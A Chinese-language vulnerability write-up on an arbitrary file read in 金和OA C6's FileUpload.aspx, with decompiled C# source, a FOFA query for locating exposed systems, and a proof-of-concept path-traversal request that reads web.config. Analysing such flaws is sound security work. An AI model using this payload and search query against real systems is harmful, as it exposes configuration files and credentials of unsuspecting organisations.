漏洞简介
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 FileUpload.aspx 接口存在任意文件读取漏洞。攻击者通过构造恶意请求访问该接口,传入任意文件路径参数,实现服务器上任意文件的读取,影响系统敏感数据的泄露和信息安全。
影响版本
金和OA C6
fofa语法
app="金和网络-金和OA"
漏洞分析
根据 FileUpload.aspx 的源码,在 bin 目录下查找 JHSoft.WCF.dll 将其进行反编译后找到 FileUpload 的处理逻辑
protected void Page_Load(object sender, EventArgs e)
{
string str1 = this.Request["filename"] == null ? "" : this.Request["filename"].ToString();
string str2 = string.Empty;
if (string.op_Inequality(str1, ""))
{
DirectoryInfo parent = Directory.GetParent(AppDomain.CurrentDomain.BaseDirectory.ToString());
string _SrcFilePath = string.op_Equality(ConfigurationSettings.AppSettings["FilServer"], "") ? $"{parent.ToString().ToLower().Replace("\\c6", "")}\\Resource\\GovFiles\\{str1}" : $"{parent.ToString().ToLower().Replace("\\c6", "")}\\upload\\Resource\\GovFiles\\{str1}";
string str3 = _SrcFilePath;
str2 = new Upload().FindFilebyAbsolutePath(_SrcFilePath);
if (string.op_Equality(str2, ""))
{
this.Response.Write("文件不存在,文件名:" + str1);
this.Response.Write($"请在{str3}目录下查找");
return;
}
}
this.Response.Buffer = true;
this.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
this.Response.Expires = 0;
this.Response.CacheControl = "no-cache";
FileStream fileStream = new FileStream(str2, (FileMode) 3);
byte[] numArray = new byte[(int) ((Stream) fileStream).Length];
((Stream) fileStream).Read(numArray, 0, numArray.Length);
((Stream) fileStream).Close();
if (numArray == null)
return;
try
{
this.Response.Clear();
this.Response.ClearHeaders();
this.Response.Buffer = true;
this.Response.ContentType = "application/octet-stream";
this.Response.AppendHeader("Content-Length", numArray.Length.ToString());
if (this.Request.UserAgent.ToLower().IndexOf("firefox") > -1)
this.Response.AddHeader("Content-Disposition", $"attachment;filename=\"{str1}\"");
else
this.Response.AppendHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(Encoding.UTF8.GetBytes(str1)));
this.Response.BinaryWrite(numArray);
this.Response.Flush();
this.Response.End();
}
catch (Exception ex)
{
}
}
参数filename被直接拼接进$"{parent.ToString().ToLower().Replace("\\c6", "")}\\upload\\Resource\\GovFiles\\{str1}"; 中,对参数没有任何过滤或校验,然后将路径使用FileStream进行文件操作并响应在body中,从而造成任意文件读取漏洞。
漏洞复现
POST /c6/JHSoft.WCF/FunctionNew/FileUpload.aspx/ HTTP/1.1
Host: jhsoft.mrxn.net
Content-Type: application/x-www-form-urlencoded
filename=../../../c6/web.config

可以成功读取到 web.config 的文件内容并回显。


